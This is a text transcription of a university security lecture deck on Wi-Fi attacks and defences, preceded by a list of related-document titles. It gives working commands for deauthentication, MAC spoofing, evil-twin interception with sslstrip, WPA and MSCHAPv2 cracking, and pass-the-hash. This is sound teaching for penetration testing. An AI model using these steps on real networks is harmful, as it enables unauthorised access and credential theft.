Wi-Fi: a security overview

Similar documents
D. The bank s web server is using an X.509 certificate that is not signed by a root CA, causing the user ID and password to be sent unencrypted.

Chapter 24 Wireless Network Security

Gaining Access to encrypted networks

Wireless Network Security

Wireless technology Principles of Security

Section 4 Cracking Encryption and Authentication

Wireless Security. Comp Sci 3600 Security. Attacks WEP WPA/WPA2. Authentication Encryption Vulnerabilities

Worldwide Release. Your world, Secured ND-IM005. Wi-Fi Interception System

Hacking Encrypted Wireless Network

Security of WiFi networks MARCIN TUNIA

Configuring the Wireless Parameters (CPE and WBS)

SETTING UP THE LAB 1 UNDERSTANDING BASICS OF WI-FI NETWORKS 26

Configuring a VAP on the WAP351, WAP131, and WAP371

Outline : Wireless Networks Lecture 10: Management. Management and Control Services : Infrastructure Reminder.

This repository. Insights. Projects 0. Join GitHub today

FAQ on Cisco Aironet Wireless Security

2013 Summer Camp: Wireless LAN Security Exercises JMU Cyber Defense Boot Camp

Wireless Network Security

Wireless LAN Security. Gabriel Clothier

Exam HP2-Z32 Implementing HP MSM Wireless Networks Version: 7.1 [ Total Questions: 115 ]

A Practical, Targeted, and Stealthy attack against WPA-Enterprise WiFi

TestsDumps. Latest Test Dumps for IT Exam Certification

Network Encryption 3 4/20/17

Figure 35: Active Directory Screen 6. Select the Group Policy tab, choose Default Domain Policy then click Edit.

TopGlobal MB8000 Hotspots Solution

Wireless Attacks and Countermeasures

Configuring the Client Adapter through the Windows XP Operating System

Securing a Wireless LAN

5 Steps Wifi Hacking Cracking WPA2 Password

Chapter 17. Wireless Network Security

Configuring Authentication Types

Link & end-to-end protocols SSL/TLS WPA 2/25/07. Outline. Network Security. Networks. Link and End-to-End Protocols. Link vs. End-to-end protection

U S E R M A N U A L b/g PC CARD

b/g/n 1T1R Wireless USB Adapter. User s Manual

NWD2705. User s Guide. Quick Start Guide. Dual-Band Wireless N450 USB Adapter. Version 1.00 Edition 1, 09/2012

Package Content IEEE g Wireless LAN USB Adapter... x 1 Product CD-ROM.x 1

Exam : PW Title : Certified wireless security professional(cwsp) Version : DEMO

Troubleshooting WLANs (Part 2)

WPA Migration Mode: WEP is back to haunt you

Exam Questions CWSP-205

What is Eavedropping?

Configuring Layer2 Security

Nomadic Communications Labs

Light Mesh AP. User s Guide. 2009/2/20 v1.0 draft

PROTECTED EXTENSIBLE AUTHENTICATION PROTOCOL

Nomadic Communications Labs. Alessandro Villani

11n Wireless USB Adapter

The following chart provides the breakdown of exam as to the weight of each section of the exam.

Grandstream Networks, Inc. GWN76xx Wi-Fi Access Points Master/Slave Architecture Guide

CWNA Exam PW0-100 certified wireless network administrator(cwna) Version: 5.0 [ Total Questions: 120 ]

150Mbps N Wireless USB Adapter

Network Security: WLAN Mobility. Tuomas Aura CS-E4300 Network security Aalto University, Autumn 2017

WPA Passive Dictionary Attack Overview

WPA-GPG: Wireless authentication using GPG Key

Configuring the EAPs Globally via Omada Controller

LevelOne User Manual WNC-0600USB N_One Wireless USB Adapter

Expected Outcomes Able to design the network security for the entire network Able to develop and suggest the security plan and policy

Configuring the Client Adapter through Windows CE.NET

Wireless Network Security

Managing and Securing Computer Networks. Guy Leduc. Chapter 7: Securing LANs. Chapter goals: security in practice: Security in the data link layer

3.3.2 Example to Add Profile in Profile Step 1: Click Add in Profile function

Configuring the Client Adapter through the Windows XP Operating System

Security in IEEE Networks

Missouri University of Science and Technology ACM SIG-Security 2014 Wi-Fi Workshop Exploitation Handbook

Cisco EXAM Implementing Cisco Unified Wireless Networking Essentials (IUWNE) Buy Full Product.

802.11g PC Card/USB Wireless Adapter

802.1X: Deployment Experiences and Obstacles to Widespread Adoption

Network Administrator s Guide

CSNT 180 Wireless Networking. Chapter 7 WLAN Terminology and Technology

Wireless LAN Access Point

ETHICAL HACKING OF WIRELESS NETWORKS IN KALI LINUX ENVIRONMENT

System Requirements. Network Administrator Guide

Table of Contents. Chapter 1Introduction Package Contents Features Specifications Physical Description...

Configuring the Client Adapter

WIRELESS EVIL TWIN ATTACK

PowerStation2 LiteStation2 LiteStation5 User s Guide

Tutorial: Simple WEP Crack

Secure Wireless LAN Design and Deployment

Network Security. Thierry Sans

COPYRIGHTED MATERIAL. Contents

GETTING THE MOST OUT OF EVIL TWIN

LiteStation2 LiteStation5 User s Guide

Wireless Security Protocol Analysis and Design. Artoré & Bizollon : Wireless Security Protocol Analysis and Design

Wireless PCI Express Adapter 300Mbps & 150Mbps

Wireless-N USB Adapter User s Manual

Chapter 1 Introduction

High Power Wireless N USB Adapter User s Manual

Vendor: HP. Exam Code: HP2-Z32. Exam Name: Implementing HP MSM Wireless Networks. Version: Demo

Physical and Link Layer Attacks

LESSON 12: WI FI NETWORKS SECURITY

Frequently Asked Questions WPA2 Vulnerability (KRACK)

CS-435 spring semester Network Technology & Programming Laboratory. Stefanos Papadakis & Manolis Spanakis

Wireless Network Security Spring 2015

Add a Wireless Network to an Existing Wired Network using a Wireless Access Point (WAP)

A Configuration Protocol for Embedded Devices on Secure Wireless Networks

Mobile MOUSe WIRELESS TECHNOLOGY SPECIALIST ONLINE COURSE OUTLINE

Table of Contents. Chapter1 About g Wireless LAN USB Adapter...1

Many organizations worldwide turn to

CYBER ATTACKS EXPLAINED: WIRELESS ATTACKS

Configuring the Xirrus Array

Transcription:

Wi-Fi: a security overview Pierre Pavlidès EURECOM - SysSec course December 15, 2017 Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 1 / 60

Before we start Pierre Pavlidès @rogdham EURECOM student 2011-2012 Security consultant for 4 years Want to work in the industry? Send me your CV! Penetration testing Forensics Reverse engineer Python dev Paris Lyon (I work there!) Marseille... Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 2 / 60

Obligatory XKCD https://xkcd.com/416/ Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 3 / 60

Agenda 1 General 2 Open Wi-Fi 3 Adding some security: WEP, WPA 4 WPA personal 5 WPA enterprise 6 Conclusion Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 4 / 60

Agenda 1 General 2 Open Wi-Fi 3 Adding some security: WEP, WPA 4 WPA personal 5 WPA enterprise 6 Conclusion Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 5 / 60

Wi-Fi you say? Wi-Fi: technology based on IEEE 802.11 standard Protocol Band Max speed Date 802.11a 5GHz 54 Mb/s 1999 802.11b 2.4GHz 11 Mb/s 1999 802.11g 2.4GHz 54 Mb/s 2003 802.11n 2.4/5GHz 600 Mb/s 2009 Many Wi-Fi adapters today are dual-band Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 6 / 60

Channels in the 2.4GHz band Channels are overlapping Some are legally restricted Channel 14 only used in Japan Channels 12 & 13 are power restricted in the US In France: max emission power of 100mW EIRP https://www.arcep.fr/index.php?id=9272 https://en.wikipedia.org/wiki/list_of_wlan_channels Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 7 / 60

Modes of operation Infrastructure mode Access point (AP) + stations (STA) = basic service set (BSS) APs in the same distribution system (DS) = extended service set (ESS) Roaming between APs in the same ESS AP relays packet between STAs Ad hoc networks No AP: peer to peer mode STAs communicate directly with each other Monitor mode Not a wireless mode but a configuration mode of the driver Like promiscuous mode for a wired card Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 8 / 60

Hardware choice Things to consider: 2.4 GHz / 5 GHz / dual-band Internal card / USB adapter Emission & reception power Antenna: omnidirectional / directional And for pentesting: Full-fledged drivers in Linux Limit to some models in the 2.4 GHz band Is still a huge issue in the 5 GHz band Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 9 / 60

Hardware: popular choices for pentesting in 2.4 GHz band Alpha Network (26 ) Allow to go above legal emission power TP-Link TL-WN722N (9 ) Since v2, not 100% Linux driver support (yet) Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 10 / 60

Practice time List your Wi-Fi adapters $ iwconfig lo no wireless extensions. enp1s0 no wireless extensions. wlp0s20f0u2 IEEE 802.11 ESSID : off / any Mode : Managed Access Point : Not - Associated Tx - Power =0 dbm Retry short limit :7 RTS thr : off Fragment thr : off Power Management : off # airmon -ng PHY Interface Driver Chipset phy0 wlp0s20f0u2 ath9k_htc Qualcomm Atheros Communications AR9271 802.11 n If the predictable network interface names feature is disabled, your Wi-Fi adapter will likely be wlan0, wlan1, etc. Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 11 / 60

Monitor mode # airmon - ng start <interface > List possibly interfering processes (and offer to kill them) Rename the interface, adding mon at the end $ iwconfig wlp0s20f0u2mon wlp0s20f0u2mon IEEE 802.11 Mode : Monitor Frequency :2.457 GHz Tx - Power =20 dbm Retry short limit :7 RTS thr : off Fragment thr : off Power Management : off Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 12 / 60

Wi-Fi network scanning # airodump - ng <interface > Space to pause output -c <channel> or for 5 GHz band: -b a -N <SSID> or -R <SSID-regex> -d <BSSID> (and -m <BSSID-mask>) To filter out unassociated STAs: -a Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 13 / 60

Wi-Fi network scanning Top part: APs Network: name (ESSID), type (ENC/CIPHER/AUTH), channel (CH) AP s MAC (BSSID) Signal strength (PWR/RXQ) Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 14 / 60

Wi-Fi network scanning Bottom part: STAs Associated with AP: BSSID (if any) STA s MAC (STATION) Signal strength (PWR) How active is STA (number of frames) Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 15 / 60

Hidden networks Usually, APs broadcast their SSIDs with beacon frames Useful since it is required for an STA to associate with an AP SSID in the association request frame Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 16 / 60

Hidden networks: recovering the SSID BSSID PWR Beacons ESSID 11:22:33:44:55:66-13 42 < length : 0> BSSID STATION PWR 11:22:33:44:55:66 77:88:99: aa: bb: cc -37 To recover the SSID, wait for a STA to associate Speed-up: send disassociation frames STA will automatically try to re-associate airmon-ng will eavesdrop the association request, extract the SSID and display it # aireplay - ng -a 11:22:33:44:55:66 -c 77:88:99: aa: bb: cc -0 1 < interface > Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 17 / 60

Agenda 1 General 2 Open Wi-Fi 3 Adding some security: WEP, WPA 4 WPA personal 5 WPA enterprise 6 Conclusion Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 18 / 60

Open Wi-Fi No authentication Anyone can join the network Everything is send in clear text Passive man-in-the-middle (MitM) attack: just set your card in monitor mode Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 19 / 60

MAC based access control Allow association only for clients with Media Access Control (MAC) in whitelist Wait, MAC are sent in cleartext, right? BSSID PWR Beacons ESSID 11:22:33:44:55:66-13 42 DatNetwork BSSID STATION PWR 11:22:33:44:55:66 77:88:99: aa: bb: cc -37 Impersonate MAC and get access # ip link set dev <interface > address 77:88:99: aa: bb: cc Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 20 / 60

Captive portals: overview Most open Wi-Fi networks are protected with captive portals Still no authentication to join the network But segregated on different VLAN Overview You join an open network You are on a separated VLAN You somehow open your browser on the captive portal (next slide) You enter credentials You are transparently moved to another VLAN with more access Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 21 / 60

Captive portals: redirection Method 1: MitM all HTTP requests, insert redirection Method 2: lying DNS server pointing to captive portal How to get the user to browse an HTTP (not HTTPS) page? Unusual nowadays thanks to Let s Encrypt, HSTS, etc. Browser and OS support e.g. Chrome visits http://www.gstatic.com/generate_204 Issue with method 1: DNS queries not filtered Maybe build a simple tunnel through port 53 Or a DNS tunnel, e.g. with iodine Allows attacker to access Internet, not the internal network Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 22 / 60

Captive portals on open Wi-Fi: no authentication Captive portals: access control based on MAC address Previous attack still work Get MAC of authenticated STA Impersonate MAC # ip link set dev <interface > address 77:88:99: aa: bb: cc Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 23 / 60

Captive portals on open Wi-Fi: no encryption Open Wi-Fi provide no confidentiality of data Maybe the captive portal is in HTTP (and not HTTPS)? Passive MitM attack Get credentials Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 24 / 60

Evil Twin attack: active MitM Devices will connect to the AP with best reception Let s be that AP! Broadcasting same SSID Relay all data to real AP Play with emission power, beacon frames interval, proximity to victim Send disassociation frames This attack allows for active MitM Edit data on the fly Create an AP (e.g. with hostapd+dnsmasq), enable IP forwarding # sysctl -w net. ipv4. ip_forward =1 Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 25 / 60

Evil Twin attack on captive portal We now have access the network (RealAP sees Attacker s MAC) Without modifying any of the relayed data But we don t have the credentials (HTTPS) Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 26 / 60

Evil Twin attack + sslstrip # iptables -t nat -A PREROUTING -p tcp -- destination - port 80 -j REDIRECT --to - port 10000 $ sslstrip -w data. log We have the credentials! Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 27 / 60

Evil Twin attack + sslstrip: ios auth popup difference Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 28 / 60

Evil Twin attack: having fun with active MitM Getting credentials is quite fun already What about changing img s src in all pages? Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 29 / 60

Open Wi-Fi: conclusion No authentication Easy to get passive MitM Not difficult to get active MitM Captive portals Still no authentication to join the Wi-Fi network Can be bypassed Widely deployed For guests (corporate world) or customers (hotels, airports... ) So protect yourself: double-check HTTPS, use VPNs Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 30 / 60

Agenda 1 General 2 Open Wi-Fi 3 Adding some security: WEP, WPA 4 WPA personal 5 WPA enterprise 6 Conclusion Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 31 / 60

Wired Equivalent Privacy (WEP) Open networks provide no authentication Adding authentication afterwards (captive portals) is not enough WEP (1997) Simple encryption based on RC4 Shared key: 64 bits or 128 bits Since 2001: end of the WEP era Main issue: RC4 with key + IV reuse Many attacks, now attackers retrieve keys within 1 minute Today nobody uses WEP anymore (hopefully) Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 32 / 60

Wi-Fi Protected Access (WPA) WPA1 (2003) Created to address WEP issues No change in hardware needed: uses TKIP algo (making sure RC4 is used with different key and IV) WPA2 (2004) IEEE 802.11i Can use TKIP or CCMP (AES-based) Also, CCMP backported to WPA1 Today, no real difference between WPA1 and WPA2 But prefer CCMP: some attacks on TKIP exist (e.g. PASEC 2008) Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 33 / 60

WPA flavours First phase: getting the master key (MK) Exchanges are not secured yet Can be PSK (WPA personal) or EAP-based (WPA enterprise) Second phase: exchanging other secrets Four-way handshake Secured thanks to the MK Each party proves knowledge of MK (authentication) Last phase: using the secrets TKIP / CCMP to protect communications Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 34 / 60

Agenda 1 General 2 Open Wi-Fi 3 Adding some security: WEP, WPA 4 WPA personal 5 WPA enterprise 6 Conclusion Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 35 / 60

WPA personal (i.e. with PSK) Pre-shared key (PSK) 8 to 63 printable ASCII (0x20 to 0x7e) MK = PBKDF 2(PSK, SSID) Overview of the attack: Capture a four-way handshake (disassociate STA if needed) Run a dictionary-based attack on the PSK used in that handshake Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 36 / 60

WPA 4-way handshake Attack only requires the first 2 frames Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 37 / 60

WPA 4-way handshake: testing a PSK MK = PBKDF 2(PSK, SSID) PTK = PRF (MK, MAC AP, MAC STA, ANonce, SNonce) MIC = HMAC X(PTK 0:15, frame) X is MD5 for WPA and SHA1 for WPA2 In other words, we need: PSK to be tested SSID First two frames of the handshake Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 38 / 60

Cracking WPA 4-way handshake on CPU with aircrack-ng $ aircrack -ng -w < dictionary.txt > < capture.cap > [-e <SSID >] Test speed on your machine Uses all CPU cores $ aircrack - ng -S Normal results: between 1 000 and 10 000 PSK tested per second Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 39 / 60

Cracking WPA 4-way handshake on GPU with hashcat $ aircrack -ng < capture.cap > -J < capture. hccap > $ hashcat -m 2500 < capture. hccap > < dictionary. txt > $ hashcat -m 2500 -a3 < capture. hccap > '?d?d?d?d?d?d?d?d ' Test speed on your machine uses all CPU cores and GPUs depending on installation (OpenCL) $ hashcat -m 2500 -b GeForce GTX 1080 Ti: 500 000 PSK tested per second Expected results for almost any GPU model on hashcat forums Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 40 / 60

WPA 4-way handshake: cracking speeds You buy some good GPU... 1 000 000 PSK tested per second PSK length PSK charset Duration 8 0-9 2 min min length 8 0-9a-f 1h12 8 a-z 2.5 days 8 a-z0-9 33 days 8 a-za-z0-9 7 years 26 0-9A-F 10 17 years ISP router 63 \x20-\x7e 10 112 years max complexity Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 41 / 60

WPA PSK: once you have the PSK Obviously, you can connect to the network with the PSK And then try to attack other hosts, etc. It is also possible to decrypt network captures Allows to see traffic of other STAs The 4-way handshake of that STA needs to be in the capture $ airdecap - ng -e <ESSID > -p <PSK > < capture. cap > Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 42 / 60

WPA PSK: conclusion PSK cracking Create good dictionaries (e.g. Alice1996) If the PSK is strong, you will never get it Best practices (defender side) Use strong PSK Change PSK periodically Should not be used in enterprise environments Needs to be changed every time an employee leaves the company Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 43 / 60

Agenda 1 General 2 Open Wi-Fi 3 Adding some security: WEP, WPA 4 WPA personal 5 WPA enterprise 6 Conclusion Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 44 / 60

WPA enterprise Many Extensible Authentication Protocols (EAP) can be used with WPA The most widely deployed are: PEAP/EAP-MSCHAPv2: STA auth with domain credentials EAP-TLS: mutual auth via server & client certificates Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 45 / 60

WPA PEAP/MSCHAPv2 PEAP: a TLS tunnel is created between STA and RADIUS server STA checks certificate of RADIUS server Then the EAP-MSCHAPv2 protocol is performed Usually with user credentials (domain) Sometimes with machine credentials Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 46 / 60

MSCHAPv2 protocol NT = MD4(UserPassword) ServerChal is randomly generated by the RADIUS server ClientChal is randomly generated by the STA ChalHash = SHA1(ClientChal ServerChal Username) 0:7 ChalResponse = DES NT0:6 (ChalHash) DES NT7:13 (ChalHash) DES NT14:20 (ChalHash) AuthResponse = Φ(NT, ChalResponse, ChalHash) Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 47 / 60

MSCHAPv2 and NetNTLMv1 ChalResponse = DES NT0:6 (ChalHash) DES NT7:13 (ChalHash) DES NT14:20 (ChalHash) Only third frame is needed From an attacker point of view, this is the same as NetNTLMv1 Naive cracking: Compute NT = MD4(UserPass) Check if each part of the DES encryption matches the ChalResponse Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 48 / 60

MSCHAPv2/NetNTLMv1 Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 49 / 60

MSCHAPv2/NetNTLMv1: improving the cracking We can recover the last 2 bytes of the NT by pure bruteforce (in seconds) Improved cracking: Compute NT = MD4(UserPass) If last 2 bytes of NT don t match, abort Check if each part of the DES encryption matches the ChalResponse We get almost same speed as NT cracking as a result $ john -- format =nt -- test =10 Raw : 43096 K c/ s real $ john -- format = netntlm -- test =10 Only one salt : 41776 K c/ s real Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 50 / 60

Evil Twin attack WPA PEAP/EAP-MSCHAPv2 Overview of the attack: Evil Twin access point with custom certificate Wait for STA to associate with it (send disassociation frames if needed) Capture MSCHAPv2 exchanges Crack MSCHAPv2 Use a patched version of hostapd: hostapd-wpe or hostapd-mana STA 77:88:99: aa: bb: cc IEEE 802.11: associated ( aid 1) CTRL - EVENT -EAP - STARTED 77:88:99: aa:bb:cc CTRL - EVENT -EAP - PROPOSED - METHOD vendor =0 method =1 CTRL - EVENT -EAP - PROPOSED - METHOD vendor =0 method =25 mschapv2 : username : angelcorp \ alice challenge : f6 :83: a7:b7 :5c:ae:c3:fa response : 3a :39: bb :55:7 e :06:29: f3 :6c:d6 :df:c0 :7f:4f:b0 :9d :53:54:26:29:3 e: a8: c3 :13 jtr NETNTLM : angelcorp \ alice : $NETNTLM$f683a7b75caec3fa$3a... STA 77:88:99: aa: bb: cc IEEE 802.11: disassociated Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 51 / 60

Evil Twin attack WPA PEAP/EAP-MSCHAPv2 What if the STA checks the CA of the RADIUS server? Needs to be enabled Some configuration prompts the user (with obscure error message) STA 77:88:99: aa: bb: cc IEEE 802.11: associated ( aid 1) CTRL - EVENT -EAP - STARTED 77:88:99: aa:bb:cc CTRL - EVENT -EAP - PROPOSED - METHOD vendor =0 method =1 CTRL - EVENT -EAP - PROPOSED - METHOD vendor =0 method =25 SSL : SSL3 alert : read ( remote end reported an error ): fatal : unknown CA OpenSSL : openssl_handshake - SSL_connect error :14094418: SSL routines : ssl3_read_bytes : tlsv1 alert unknown ca CTRL - EVENT -EAP - FAILURE 77:88:99: aa:bb:cc STA 77:88:99: aa: bb: cc IEEE 802.1 X: authentication failed - EAP type : 0 ( unknown ) Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 52 / 60

MSCHAPv2/NetNTLMv1: cracking speed GTX 1080 Ti: 30.8 GH/s, that s 3.10 10 tests per second (remember WPA PSK: 5.10 5 tests per second) Password length Password charset Duration 14 0-9 54min 12 0-9a-f 2h33 10 a-z 1h17 9 a-z0-9 55min 8 a-za-z0-9 1h59 8 \x20-\x7e 2 days 17h Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 53 / 60

MSCHAPv2/NetNTLMv1: exhaustive search However, it is possible to recover the full NT by exhaustive search Interesting watch: https://www.youtube.com/watch?v=siidzpntdcm Using crack.sh Cost: 20$ or 200$ to get NT within 26h! Issue (for white hats): giving the hash to a third party Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 54 / 60

Having the NT is enough With crack.sh, we only have the NT However, thanks to the pass-the-hash feature of Windows, it is enough: To authenticate on the Wi-Fi To access shares To open sessions Use the exploit/windows/smb/psexec_psh module in Metasploit Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 55 / 60

WPA PEAP/EAP-MSCHAPv2: conclusion EAP-MSCHAPv2 protected by PEAP (TLS) Evil Twin attack with own (invalid) certificate MSCHAPv2 challenge-response cracking Very fast on CPU/GPU Or just use crack.sh to get the NT If successful, attacker has more than an access to the network User credentials give access to resources Best practices (defender side) Force the STA to check the certificate of the RADIUS server Use EAP-TLS instead: each STA has its own client certificate In both cases: use GPOs and mobile device management (MDM) Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 56 / 60

Agenda 1 General 2 Open Wi-Fi 3 Adding some security: WEP, WPA 4 WPA personal 5 WPA enterprise 6 Conclusion Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 57 / 60

Conclusion Attacks on the 3 main type of Wi-Fi networks: Open Easy to get passive/active MitM Attacks on captive portals WPA PSK Dictionary attack on 4-way handshake Will not work for robust PSK Allows to access network, decrypt traffic WPA PEAP/EAP-MSCHAPv2 Evil Twin attack to get MSCHAPv2 challenge-response Will not work if certificate is properly checked Dictionary attack or bruteforce NT Allows to access network, and usually more But still many topics not covered... Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 58 / 60

Going the extra mile Captive portals Why does HSTS protects against sslstrip? What is sslstrip+/sslstrip2 doing against HSTS, is it effective? WEP WPA PSK Precomputed tables, why are they specific to some SSID? WPS (Wi-Fi Protected Setup): bruteforce PIN, AP protections, null PIN attack (August 2017) Vulnerable home routers where PSK can be found from SSID/BSSID (e.g. old Bbox) WPA Enterprise Understand differences between various types of EAP available KRACK attack (October 2017) on all WPA flavours What does it do exactly? There will probably be a public PoC at some point, look into it Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 59 / 60

Thank you! Feel free to contact me I ll be around this afternoon Or just send me an email! Q&A Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 60 / 60

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback